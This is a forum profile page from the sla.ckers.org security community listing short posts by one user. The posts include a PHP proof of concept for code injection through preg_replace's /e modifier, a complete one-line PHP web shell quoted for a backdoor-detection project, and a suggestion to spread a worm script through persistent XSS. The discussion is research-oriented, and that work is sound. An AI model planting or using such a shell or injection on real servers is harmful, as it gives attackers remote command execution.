Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 1
Results 1 - 6 of 6
4 years ago
hookits
Thanks .mario & rvdh:) I found some very simple PoC, just like /*test.php*/ <?php $h = $_GET['h']; echo preg_replace("/test/e",$h,"jutst test"); ?> It works like this: hxxp://site.com/test.php?h=phpinfo()
Forum: OMG Ponies
4 years ago
hookits
Hey, guys I found an interesting function in php.net http://www.php.net/manual/en/function.preg-replace.php#36810 Here is the function: <?php /** * Written by Rowan Lewis of PixelCarnage.com * $search(string), the string to be searched for * $replace(string), the string to replace $search * $subject(string), the string to be searched in */ function word_replace($search, $r
Forum: OMG Ponies
5 years ago
hookits
http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml
Forum: CSRF and Session Info
5 years ago
hookits
@rvdh You are a fucking genius :P @sydarex I found this site, wish to help you :P http://blog.code-head.com/a-php-form-obfuscator-secure-and-spam-free-php-forms
Forum: Projects
5 years ago
hookits
Hey, guys! I want to create a project to detect the php backdoor, and I found a very easy example of php backdoor is(by http://michaeldaw.org): <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: hxxp://target.com/simple-backdoor.php
Forum: Projects
5 years ago
hookits
yep, you are right, you should use the evil script AJAX-WORM.js via a xss vulnerability, a persistent-xss will be better :p there will be some more security policy about iframe, i don't think it will work in an iframe.
Forum: XSS Info
Current Page: 1 of 1